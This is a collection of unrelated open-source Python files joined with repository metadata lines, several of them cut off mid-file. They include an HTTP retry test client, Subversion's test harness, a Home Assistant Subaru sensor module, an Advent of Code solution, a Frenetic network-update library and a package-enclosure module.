Return 408 status code, then 200 after retry
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: None
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/http/retry/408'
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.head(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
raise models.ErrorException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def put500(
self, boolean_value=None, custom_headers=None, raw=False, **operation_config):
"""
Return 500 status code, then 200 after retry
:param boolean_value: Simple boolean value true
:type boolean_value: bool
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: None
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/http/retry/500'
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct body
if boolean_value is not None:
body_content = self._serialize.body(boolean_value, 'bool')
else:
body_content = None
# Construct and send request
request = self._client.put(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, **operation_config)
if response.status_code not in [200]:
raise models.ErrorException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def patch500(
self, boolean_value=None, custom_headers=None, raw=False, **operation_config):
"""
Return 500 status code, then 200 after retry
:param boolean_value: Simple boolean value true
:type boolean_value: bool
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: None
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/http/retry/500'
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct body
if boolean_value is not None:
body_content = self._serialize.body(boolean_value, 'bool')
else:
body_content = None
# Construct and send request
request = self._client.patch(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, **operation_config)
if response.status_code not in [200]:
raise models.ErrorException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def get502(
self, custom_headers=None, raw=False, **operation_config):
"""
Return 502 status code, then 200 after retry
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: None
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/http/retry/502'
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
raise models.ErrorException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def post503(
self, boolean_value=None, custom_headers=None, raw=False, **operation_config):
"""
Return 503 status code, then 200 after retry
:param boolean_value: Simple boolean value true
:type boolean_value: bool
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: None
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
        url = '/http/retry/503'
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
        if custom_headers:
header_parameters.update(custom_headers)
# Construct body
if boolean_value is not None:
body_content = self._serialize.body(boolean_value, 'bool')
else:
body_con
|
centic9/subversion-ppa
|
subversion/tests/cmdline/svntest/main.py
|
Python
|
apache-2.0
| 78,919 | 0.01219 |
#
# main.py: a shared, automated test suite for Subversion
#
# Subversion is a tool for revision control.
# See http://subversion.tigris.org for more information.
#
# ====================================================================
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
######################################################################
import sys
import os
import shutil
import re
import stat
import subprocess
import time
import threading
import optparse
import xml
import urllib
import logging
import hashlib
from urlparse import urlparse
try:
# Python >=3.0
import queue
from urllib.parse import quote as urllib_parse_quote
from urllib.parse import unquote as urllib_parse_unquote
except ImportError:
# Python <3.0
import Queue as queue
from urllib import quote as urllib_parse_quote
from urllib import unquote as urllib_parse_unquote
import svntest
from svntest import Failure
from svntest import Skip
SVN_VER_MINOR = 8
######################################################################
#
# HOW TO USE THIS MODULE:
#
# Write a new python script that
#
# 1) imports this 'svntest' package
#
# 2) contains a number of related 'test' routines. (Each test
# routine should take no arguments, and return None on success
# or throw a Failure exception on failure. Each test should
# also contain a short docstring.)
#
# 3) places all the tests into a list that begins with None.
#
# 4) calls svntest.main.client_test() on the list.
#
# Also, your tests will probably want to use some of the common
# routines in the 'Utilities' section below.
#
#####################################################################
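######################################################################
# Illustrative sketch of the recipe above (not part of this module).
# A minimal test script following steps 1-4 might look like this:
#
#   import svntest
#
#   def my_first_test():
#       "short docstring describing the test"
#       pass   # return None on success, raise svntest.Failure on failure
#
#   test_list = [ None,
#                 my_first_test,
#               ]
#
#   if __name__ == '__main__':
#       svntest.main.client_test(test_list)
######################################################################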
# Global stuff
default_num_threads = 5
# Don't try to use this before calling execute_tests()
logger = None
class SVNProcessTerminatedBySignal(Failure):
"Exception raised if a spawned process segfaulted, aborted, etc."
pass
class SVNLineUnequal(Failure):
"Exception raised if two lines are unequal"
pass
class SVNUnmatchedError(Failure):
"Exception raised if an expected error is not found"
pass
class SVNCommitFailure(Failure):
"Exception raised if a commit failed"
pass
class SVNRepositoryCopyFailure(Failure):
"Exception raised if unable to copy a repository"
pass
class SVNRepositoryCreateFailure(Failure):
"Exception raised if unable to create a repository"
pass
# Windows specifics
if sys.platform == 'win32':
windows = True
file_scheme_prefix = 'file:'
_exe = '.exe'
_bat = '.bat'
os.environ['SVN_DBG_STACKTRACES_TO_STDERR'] = 'y'
else:
windows = False
file_scheme_prefix = 'file://'
_exe = ''
_bat = ''
# The location of our mock svneditor script.
if windows:
svneditor_script = os.path.join(sys.path[0], 'svneditor.bat')
else:
svneditor_script = os.path.join(sys.path[0], 'svneditor.py')
# Username and password used by the working copies
wc_author = 'jrandom'
wc_passwd = 'rayjandom'
# Username and password used by the working copies for "second user"
# scenarios
wc_author2 = 'jconstant' # use the same password as wc_author
stack_trace_regexp = r'(?:.*subversion[\\//].*\.c:[0-9]*,$|.*apr_err=.*)'
# Set C locale for command line programs
os.environ['LC_ALL'] = 'C'
######################################################################
# The locations of the svn, svnadmin and svnlook binaries, relative to
# the only scripts that import this file right now (they live in ../).
# Use --bin to override these defaults.
svn_binary = os.path.abspath('../../svn/svn' + _exe)
svnadmin_binary = os.path.abspath('../../svnadmin/svnadmin' + _exe)
svnlook_binary = os.path.abspath('../../svnlook/svnlook' + _exe)
svnrdump_binary = os.path.abspath('../../svnrdump/svnrdump' + _exe)
svnsync_binary = os.path.abspath('../../svnsync/svnsync' + _exe)
svnversion_binary = os.path.abspath('../../svnversion/svnversion' + _exe)
svndumpfilter_binary = os.path.abspath('../../svndumpfilter/svndumpfilter' + \
_exe)
svnmucc_binary=os.path.abspath('../../svnmucc/svnmucc' + _exe)
entriesdump_binary = os.path.abspath('entries-dump' + _exe)
atomic_ra_revprop_change_binary = os.path.abspath('atomic-ra-revprop-change' + \
_exe)
wc_lock_tester_binary = os.path.abspath('../libsvn_wc/wc-lock-tester' + _exe)
wc_incomplete_tester_binary = os.path.abspath('../libsvn_wc/wc-incomplete-tester' + _exe)
######################################################################
# The location of svnauthz binary, relative to the only scripts that
# import this file right now (they live in ../).
# Use --tools to override these defaults.
svnauthz_binary = os.path.abspath('../../../tools/server-side/svnauthz' + _exe)
svnauthz_validate_binary = os.path.abspath(
'../../../tools/server-side/svnauthz-validate' + _exe
)
# Location to the pristine repository, will be calculated from test_area_url
# when we know what the user specified for --url.
pristine_greek_repos_url = None
# Global variable to track all of our options
options = None
# End of command-line-set global variables.
######################################################################
# All temporary repositories and working copies are created underneath
# this dir, so there's one point at which to mount, e.g., a ramdisk.
work_dir = "svn-test-work"
# Constant for the merge info property.
SVN_PROP_MERGEINFO = "svn:mergeinfo"
# Constant for the inheritable auto-props property.
SVN_PROP_INHERITABLE_AUTOPROPS = "svn:auto-props"
# Constant for the inheritable ignores property.
SVN_PROP_INHERITABLE_IGNORES = "svn:global-ignores"
# Where we want all the repositories and working copies to live.
# Each test will have its own!
general_repo_dir = os.path.join(work_dir, "repositories")
|
general_wc_dir = os.path.join(work_dir, "working_copies")
# temp directory in which we will create our 'pristine' local
# repository and other scratch data. This should be removed when we
# quit and when we startup.
temp_dir = os.path.join(work_dir, 'local_tmp')
# (derivatives of the tmp dir.)
pristine_greek_repos_dir = os.path.join(temp_dir, "repos")
greek_dump_dir = os.path.join(temp_dir, "greekfiles")
default_config_dir = os.path.abspath(os.path.join(temp_dir, "config"))
#
# Our pristine greek-tree state.
#
# If a test wishes to create an "expected" working-copy tree, it should
# call main.greek_state.copy(). That method will return a copy of this
# State object which can then be edited.
#
_item = svntest.wc.StateItem
greek_state = svntest.wc.State('', {
'iota' : _item("This is the file 'iota'.\n"),
'A' : _item(),
'A/mu' : _item("This is the file 'mu'.\n"),
'A/B' : _item(),
'A/B/lambda' : _item("This is the file 'lambda'.\n"),
'A/B/E' : _item(),
'A/B/E/alpha' : _item("This is the file 'alpha'.\n"),
'A/B/E/beta' : _item("This is the file 'beta'.\n"),
'A/B/F' : _item(),
'A/C' : _item(),
'A/D' : _item(),
'A/D/gamma' : _item("This is the file 'gamma'.\n"),
'A/D/G' : _item(),
'A/D/G/pi' : _item("This is the file 'pi'.\n"),
'A/D/G/rho' : _item("This is the file 'rho'.\n"),
'A/D/G/tau' : _item("This is the file 'tau'.\n"),
'A/D/H' : _item(),
'A/D/H/chi' : _item("This is the file 'chi'.\n"),
'A/D/H/psi' : _item("This is the file 'psi'.\n"),
'A/D/H/o
|
partofthething/home-assistant
|
homeassistant/components/subaru/sensor.py
|
Python
|
apache-2.0
| 7,898 | 0.000886 |
"""Support for Subaru sensors."""
import subarulink.const as sc
from homeassistant.components.sensor import DEVICE_CLASSES
from homeassistant.const import (
DEVICE_CLASS_BATTERY,
DEVICE_CLASS_TEMPERATURE,
DEVICE_CLASS_VOLTAGE,
LENGTH_KILOMETERS,
LENGTH_MILES,
PERCENTAGE,
PRESSURE_HPA,
TEMP_CELSIUS,
TIME_MINUTES,
VOLT,
VOLUME_GALLONS,
VOLUME_LITERS,
)
from homeassistant.util.distance import convert as dist_convert
from homeassistant.util.unit_system import (
IMPERIAL_SYSTEM,
LENGTH_UNITS,
PRESSURE_UNITS,
TEMPERATURE_UNITS,
)
from homeassistant.util.volume import convert as vol_convert
from .const import (
API_GEN_2,
DOMAIN,
ENTRY_COORDINATOR,
ENTRY_VEHICLES,
VEHICLE_API_GEN,
VEHICLE_HAS_EV,
VEHICLE_HAS_SAFETY_SERVICE,
VEHICLE_STATUS,
)
from .entity import SubaruEntity
L_PER_GAL = vol_convert(1, VOLUME_GALLONS, VOLUME_LITERS)
KM_PER_MI = dist_convert(1, LENGTH_MILES, LENGTH_KILOMETERS)
# Fuel Economy Constants
FUEL_CONSUMPTION_L_PER_100KM = "L/100km"
FUEL_CONSUMPTION_MPG = "mi/gal"
FUEL_CONSUMPTION_UNITS = [FUEL_CONSUMPTION_L_PER_100KM, FUEL_CONSUMPTION_MPG]
SENSOR_TYPE = "type"
SENSOR_CLASS = "class"
SENSOR_FIELD = "field"
SENSOR_UNITS = "units"
# Sensor data available to "Subaru Safety Plus" subscribers with Gen1 or Gen2 vehicles
SAFETY_SENSORS = [
{
SENSOR_TYPE: "Odometer",
SENSOR_CLASS: None,
SENSOR_FIELD: sc.ODOMETER,
SENSOR_UNITS: LENGTH_KILOMETERS,
},
]
# Sensor data available to "Subaru Safety Plus" subscribers with Gen2 vehicles
API_GEN_2_SENSORS = [
{
SENSOR_TYPE: "Avg Fuel Consumption",
SENSOR_CLASS: None,
SENSOR_FIELD: sc.AVG_FUEL_CONSUMPTION,
SENSOR_UNITS: FUEL_CONSUMPTION_L_PER_100KM,
},
{
SENSOR_TYPE: "Range",
SENSOR_CLASS: None,
SENSOR_FIELD: sc.DIST_TO_EMPTY,
SENSOR_UNITS: LENGTH_KILOMETERS,
},
{
SENSOR_TYPE: "Tire Pressure FL",
SENSOR_CLASS: None,
SENSOR_FIELD: sc.TIRE_PRESSURE_FL,
SENSOR_UNITS: PRESSURE_HPA,
},
{
SENSOR_TYPE: "Tire Pressure FR",
SENSOR_CLASS: None,
SENSOR_FIELD: sc.TIRE_PRESSURE_FR,
SENSOR_UNITS: PRESSURE_HPA,
},
{
SENSOR_TYPE: "Tire Pressure RL",
SENSOR_CLASS: None,
SENSOR_FIELD: sc.TIRE_PRESSURE_RL,
SENSOR_UNITS: PRESSURE_HPA,
},
{
SENSOR_TYPE: "Tire Pressure RR",
SENSOR_CLASS: None,
SENSOR_FIELD: sc.TIRE_PRESSURE_RR,
SENSOR_UNITS: PRESSURE_HPA,
},
{
SENSOR_TYPE: "External Temp",
SENSOR_CLASS: DEVICE_CLASS_TEMPERATURE,
SENSOR_FIELD: sc.EXTERNAL_TEMP,
SENSOR_UNITS: TEMP_CELSIUS,
},
{
SENSOR_TYPE: "12V Battery Voltage",
SENSOR_CLASS: DEVICE_CLASS_VOLTAGE,
SENSOR_FIELD: sc.BATTERY_VOLTAGE,
SENSOR_UNITS: VOLT,
},
]
# Sensor data available to "Subaru Safety Plus" subscribers with PHEV vehicles
EV_SENSORS = [
{
SENSOR_TYPE: "EV Range",
SENSOR_CLASS: None,
SENSOR_FIELD: sc.EV_DISTANCE_TO_EMPTY,
SENSOR_UNITS: LENGTH_MILES,
},
{
SENSOR_TYPE: "EV Battery Level",
SENSOR_CLASS: DEVICE_CLASS_BATTERY,
SENSOR_FIELD: sc.EV_STATE_OF_CHARGE_PERCENT,
SENSOR_UNITS: PERCENTAGE,
},
{
SENSOR_TYPE: "EV Time to Full Charge",
SENSOR_CLASS: None,
SENSOR_FIELD: sc.EV_TIME_TO_FULLY_CHARGED,
SENSOR_UNITS: TIME_MINUTES,
},
]
async def async_setup_entry(hass, config_entry, async_add_entities):
"""Set up the Subaru sensors by config_entry."""
coordinator = hass.data[DOMAIN][config_entry.entry_id][ENTRY_COORDINATOR]
vehicle_info = hass.data[DOMAIN][config_entry.entry_id][ENTRY_VEHICLES]
entities = []
for vin in vehicle_info.keys():
entities.extend(create_vehicle_sensors(vehicle_info[vin], coordinator))
async_add_entities(entities, True)
def create_vehicle_sensors(vehicle_info, coordinator):
"""Instantiate all available sensors for the vehicle."""
sensors_to_add = []
if vehicle_info[VEHICLE_HAS_SAFETY_SERVICE]:
sensors_to_add.extend(SAFETY_SENSORS)
if vehicle_info[VEHICLE_API_GEN] == API_GEN_2:
sensors_to_add.extend(API_GEN_2_SENSORS)
if vehicle_info[VEHICLE_HAS_EV]:
sensors_to_add.extend(EV_SENSORS)
return [
SubaruSensor(
vehicle_info,
coordinator,
s[SENSOR_TYPE],
s[SENSOR_CLASS],
s[SENSOR_FIELD],
s[SENSOR_UNITS],
)
for s in sensors_to_add
]
class SubaruSensor(SubaruEntity):
"""Class for Subaru sensors."""
def __init__(
self, vehicle_info, coordinator, entity_type, sensor_class, data_field, api_unit
):
"""Initialize the sensor."""
super().__init__(vehicle_info, coordinator)
self.hass_type = "sensor"
self.current_value = None
self.entity_type = entity_type
self.sensor_class = sensor_class
self.data_field = data_field
self.api_unit = api_unit
@property
def device_class(self):
"""Return the class of this device, from component DEVICE_CLASSES."""
if self.sensor_class in DEVICE_CLASSES:
return self.sensor_class
return super().device_class
@property
def state(self):
"""Return the state of the sensor."""
self.current_value = self.get_current_value()
if self.current_value is None:
return None
if self.api_unit in TEMPERATURE_UNITS:
return round(
self.hass.config.units.temperature(self.current_value, self.api_unit), 1
)
if self.api_unit in LENGTH_UNITS:
return round(
self.hass.config.units.length(self.current_value, self.api_unit), 1
)
if self.api_unit in PRESSURE_UNITS:
if self.hass.config.units == IMPERIAL_SYSTEM:
return round(
self.hass.config.units.pressure(self.current_value, self.api_unit),
1,
)
if self.api_unit in FUEL_CONSUMPTION_UNITS:
if self.hass.config.units == IMPERIAL_SYSTEM:
return round((100.0 * L_PER_GAL) / (KM_PER_MI * self.current_value), 1)
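        # Illustrative check of the mpg conversion above (not in the original code):
        # 8.0 L/100km -> (100 * 3.785 L/gal) / (1.609 km/mi * 8.0) ~= 29.4 mi/gal,
        # the same as converting 100 km = 62.1 mi and 8.0 L = 2.11 gal directly.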
return self.current_value
@property
def unit_of_measurement(self):
"""Return the unit_of_measurement of the device."""
if self.api_unit in TEMPERATURE_UNITS:
return self.hass.config.units.temperature_unit
if self.api_unit in LENGTH_UNITS:
return self.hass.config.units.length_unit
if self.api_unit in PRESSURE_UNITS:
if self.hass.config.units == IMPERIAL_SYSTEM:
return self.hass.config.units.pressure_unit
return PRESSURE_HPA
if self.api_unit in FUEL_CONSUMPTION_UNITS:
if self.hass.config.units == IMPERIAL_SYSTEM:
return FUEL_CONSUMPTION_MPG
return FUEL_CONSUMPTION_L_PER_100KM
return self.api_unit
@property
def available(self):
"""Return if entity is available."""
last_update_success = super().available
if last_update_success and self.vin not in self.coordinator.data:
            return False
return last_update_success
    def get_current_value(self):
"""Get raw value from the coordinator."""
value = self.coordinator.data[self.vin][VEHICLE_STATUS].get(self.data_field)
if value in sc.BAD_SENSOR_VALUES:
value = None
if isinstance(value, str):
if "." in value:
value = float(value)
else:
value = int(value)
return value
|
andela-bojengwa/talk
|
venv/lib/python2.7/site-packages/django_filters/__init__.py
|
Python
|
mit
| 485 | 0.002062 |
# flake8: noqa
from __future__ import absolute_import
from .filterset import FilterSet
from .filters import *
__version__ = '0.9.2'
def parse_version(version):
'''
'0.1.2-dev' -> (0, 1, 2, 'dev')
'0.1.2' -> (0, 1, 2)
'''
v = version.split('.')
v = v[:-1] + v[-1].split('-')
ret = []
for p in v:
if p.isdigit():
ret.append(int(p))
|
else:
ret.append(p)
return tuple(ret)
VERSION = parse_version(__version__)
|
sclarke/adventofcode2016
|
d07.py
|
Python
|
bsd-3-clause
| 1,196 | 0.001672 |
import re
with open('d07.txt') as f:
raw_input = f.readlines()
test_input = """abba[mnop]qrst
abcd[bddb]xyyx
aaaa[qwer]tyui
ioxxoj[asdfgh]zxcvbn
asdfasdf[qwerqwer]asdffdsa[12341234]zcxvzcv""".splitlines()
def group_finder(s):
head, _, tail = s.partition('[')
yield head
if tail:
yield from group_finder(tail)
re_abba = re.compile(r'.*([a-z])(?!\1)([a-z])\2\1')
total = 0
for line in raw_input:
line_groups = list(group_finder(line.replace(']', '[')))
ips = line_groups[::2]
hns = line_groups[1::2]
if any(re_abba.match(ip) for ip in ips) and not any(re_abba.match(hn) for hn in hns):
total += 1
print(total)
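# Quick sanity check of the ABBA regex above (illustrative addition):
# 'abba' and 'ioxxoj' contain an ABBA sequence, 'aaaa' does not.
assert re_abba.match('abba')
assert re_abba.match('ioxxoj')
assert not re_abba.match('aaaa')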
# part 2!
test_input = """aba[bab]xyz
xyx[xyx]xyx
aaa[kek]eke
zazbz[bzb]cdb""".splitlines()
import regex
re_aba = regex.compile(r'([a-z])(?!\1)([a-z])\1')
total = 0
for line in raw_input:
line_groups = list(group_finder(line.replace(']', '[')))
ips = line_groups[::2]
hns = line_groups[1::2]
match = False
for ip in ips:
        for a, b in re_aba.findall(ip, overlapped=True):
if any(b + a + b in hn for hn in hns):
match = True
if match:
total += 1
print(total)
|
XianliangJ/collections
|
CNUpdates/updates/update_lib.py
|
Python
|
gpl-3.0
| 49,836 | 0.00602 |
################################################################################
# The Frenetic Project #
# frenetic@frenetic-lang.org #
################################################################################
# Licensed to the Frenetic Project by one or more contributors. See the #
# NOTICE file distributed with this work for additional information #
# regarding copyright and ownership. The Frenetic Project licenses this #
# file to you under the following license. #
# #
# Redistribution and use in source and binary forms, with or without #
# modification, are permitted provided the following conditions are met: #
# - Redistributions of source code must retain the above copyright #
# notice, this list of conditions and the following disclaimer. #
# - Redistributions in binary form must reproduce the above copyright #
# notice, this list of conditions and the following disclaimer in #
# the documentation or other materials provided with the distribution. #
# - The names of the copyright holds and contributors may not be used to #
# endorse or promote products derived from this work without specific #
# prior written permission. #
# #
# Unless required by applicable law or agreed to in writing, software #
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT #
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the    #
# LICENSE file distributed with this work for specific language governing     #
# permissions and limitations under the License. #
################################################################################
# /updates/update_lib.py #
# Update Library Functions #
################################################################################
from collections import defaultdict
import sys, os
from time import time
sys.path.append(os.environ['NOX_CORE_DIR'])
from nox.lib.core import UINT32_MAX, openflow
from policy import *
import logging
from decimal import Decimal
import networkx as nx
from update import UpdateObject
log = logging.getLogger("frenetic.update.update_lib")
#############
# CONSTANTS #
#############
# maximum priority of OpenFlow rules
MAX_PRIORITY = 0xffff
####################
# GLOBAL VARIABLES #
####################
# inst
# * reference to currently running NOX component
# * also stores run-time structures used during updates
# - current_version: policy version
# - current_priority: OpenFlow priority level
# - current_internal_policy: policy for versioned traffic
# - current_edge_policy: policy for unversioned traffic
# - active_flows: dictionary of active flows, used for per-flow updates
# - current_abstract_policy: unversioned policy equivalent to current
# - future_abstract_policy: unversioned policy we're updating to
# - concrete_policy: maps abstract rules to installed versioned rules
# - installed_priority: FIXME
# - stats: statistics
inst = None
experiment = False
DEBUG = True
def setup(_inst, _experiment):
"""
_inst: reference to current NOX component
sets inst to _inst and initializes run-time structures
"""
global inst
global experiment
inst = _inst
experiment = _experiment
inst.current_version = 0
inst.current_priority = MAX_PRIORITY
inst.current_internal_policy = NetworkPolicy()
inst.current_edge_policy = NetworkPolicy()
inst.active_flows = {}
inst.current_abstract_policy = NetworkPolicy()
inst.future_abstract_policy = NetworkPolicy()
inst.stats = UpdateStats()
inst.concrete_policy = defaultdict(lambda:defaultdict(lambda:[]))
inst.installed_priority = \
defaultdict(lambda:defaultdict(lambda:MAX_PRIORITY))
return
##############
# STATISTICS #
##############
# UpdateStats
class UpdateStats:
"""
Class whose objects represent statistics about the number of
policy updates, rule adds, and rule deletes.
"""
def __init__(self):
self.updates = 0
self.start_time = time()
self.installs = defaultdict(lambda:0)
self.modifies = defaultdict(lambda:0)
self.deletes = defaultdict(lambda:0)
self.current_rules = defaultdict(lambda:0)
self.current_abstract_rules = defaultdict(lambda:0)
self.future_abstract_rules = defaultdict(lambda:0)
self.max_overhead = defaultdict(lambda:0)
def tally_update(self, policy):
self.updates += 1
self.current_abstract_rules = self.future_abstract_rules
self.future_abstract_rules = {}
for switch, config in policy:
self.future_abstract_rules[switch] = Decimal(len(config))
def tally_install(self, switch):
self.installs[switch] += 1
self.current_rules[switch] += 1
def tally_overhead(self, switch, config):
"""
Calculates rule overhead, i.e. the maximum number of rules
actually installed at a time versus the minimal rules
required. So, if we had 2*N rules installed while
transitioning between configs of size N, the overhead would be
100%
"""
if switch in self.current_abstract_rules:
old_size = self.current_abstract_rules[switch]
else:
old_size = 0
if switch in self.future_abstract_rules:
new_size = self.future_abstract_rules[switch]
else:
new_size = 0
base_size = max(old_size, new_size)
extra_size = \
Decimal(self.current_rules[switch] - base_size + len(config))
overhead = extra_size/max(base_size, 1)
self.max_overhead[switch] = max(self.max_overhead[switch], overhead)
def tally_modify(self, switch):
self.modifies[switch] += 1
def tally_delete(self, switch):
self.deletes[switch] += 1
self.current_rules[switch] -= 1
def all_installs(self):
return sum(self.installs.values())
def all_modifies(self):
return sum(self.modifies.values())
def all_deletes(self):
return sum(self.deletes.values())
def all_operations(self):
return self.all_installs() + self.all_modifies()
def all_overheads(self):
return max(self.max_overhead.values())
def __str__(self):
s = " Update Statistics\n"
s += "--------------------------------------------\n"
s += "Switch\t(+)\t(-)\t(~)\tTotal\tOverhead\n"
s += "--------------------------------------------\n"
for switch in set(self.installs.keys()
+ self.deletes.keys()
+ self.modifies.keys()):
i = self.installs[switch]
d = self.deletes[switch]
m = self.modifies[switch]
o = self.max_overhead[switch]
s += "s%d\t%d\t%d\t%d\t%d\t%d%%\n" % (switch, i, d, m, i+d+m, 100*o)
s += "--------------------------------------------\n"
s += "total\t%d\t%d\t%d\t%d\t%d%%\t%.4f\n" % \
(self.all_installs(),
self.all_deletes(),
self.all_modifies(),
self.all_operations(),
100*self.all_overheads(),
time() - self.start_time)
return s
##########################################
# OPENFLOW-LEVEL INSTALL/DELETE COMMANDS #
##########################################
def install_rule(switch, pattern, actions, priority, idle_timeout):
""" Wrapper for OpenFlow add request """
inst.stats.tally_install(switch)
if not experiment:
inst.send_flow_command(switch,
|
michal-ruzicka/archivematica
|
src/dashboard/src/components/mcp/views.py
|
Python
|
agpl-3.0
| 1,507 | 0.005309 |
# This file is part of Archivematica.
#
# Copyright 2010-2013 Artefactual Systems Inc. <http://artefactual.com>
#
# Archivematica is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Archivematica is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Archivematica. If not, see <http://www.gnu.org/licenses/>.
from django.http import HttpResponse
from contrib.mcp.client import MCPClient
from lxml import etree
def execute(request):
result = ''
if 'uuid' in request.REQUEST:
client = MCPClient()
|
uuid = request.REQUEST.get('uuid', '')
choice = request.REQUEST.get('choice', '')
        uid = request.REQUEST.get('uid', '')
result = client.execute(uuid, choice, uid)
return HttpResponse(result, mimetype = 'text/plain')
def list(request):
client = MCPClient()
jobs = etree.XML(client.list())
response = ''
if 0 < len(jobs):
for job in jobs:
response += etree.tostring(job)
response = '<MCP>%s</MCP>' % response
return HttpResponse(response, mimetype = 'text/xml')
|
saintleva/limited-apt
|
src/limitedapt/enclosure.py
|
Python
|
gpl-3.0
| 8,559 | 0.008062 |
# Copyright (C) Anton Liaukevich 2011-2020 <leva.dev@gmail.com>
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 3 of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
'''Package "enclosure" structure description and processing'''
from lxml import etree
from .errors import *
class EveryError(Error): pass
class EveryAndDistinctError(EveryError): pass
class VersionsEveryAndDistinctError(EveryAndDistinctError): pass
class ArchAndVersionsEveryAndDistinctError(EveryAndDistinctError): pass
class CannonEnumerateEvery(EveryError): pass
class CannotAddExistingPackage(Error): pass
class EnclosureImportSyntaxError(XmlImportSyntaxError):
    '''Syntax or semantic error while parsing the enclosure structure'''
class Versions:
def __init__(self, isevery=False):
self.__isevery = isevery
self.__items = set()
@property
def isevery(self):
return self.__isevery
def __iter__(self):
if self.isevery:
raise CannonEnumerateEvery("Cannot enumerate every possible versions")
return iter(self.__items)
def __contains__(self, version):
return self.isevery or version in self.__items
def add(self, version):
if self.isevery:
raise VersionsEveryAndDistinctError("You must not add distinct versions where every added")
self.__items.add(version)
class ArchAndVersions:
def __init__(self, isevery=False):
self.__every = Versions() if isevery else None
self.__data = {}
@property
def isevery(self):
return self.__every is not None
@property
def every(self):
return self.__every
@every.setter
def every(self, value):
self.__every = value
def __iter__(self):
if self.isevery:
raise CannonEnumerateEvery("Cannot enumerate every possible architectures and versions")
return iter(self.__data.items())
def has_arch_version(self, arch, version):
if self.isevery:
return version in self.every
else:
#TODO: Is it right?
try:
return version in self.__data[arch]
except KeyError:
try:
return version in self.__data["all"]
except KeyError:
return False
def add(self, versions, arch=None):
if self.every:
assert arch is None
self.every = versions
else:
assert arch is not None
self.__data[arch] = versions
def add_single(self, version, arch=None):
if self.every:
assert arch is None
self.every.add(version)
else:
assert arch is not None
try:
self.__data[arch].add(version)
except KeyError:
versions = Versions()
versions.add(version)
self.__data[arch] = versions
class Enclosure:
def __init__(self):
self.__packages = {}
def __iter__(self):
return iter(self.__packages)
def __contains__(self, package):
try:
return self.__packages[package.name].has_arch_version(package.architecture, package.version)
except KeyError:
return False
|
def clear(self):
self.__packages.clear()
def add_package(self, name, arch_and_versions):
if name in self.__packages:
raise CannotAddExistingPackage("Package '{0}' is already in the eclosure".format(name))
self.__packages[name] = arch_and_versions
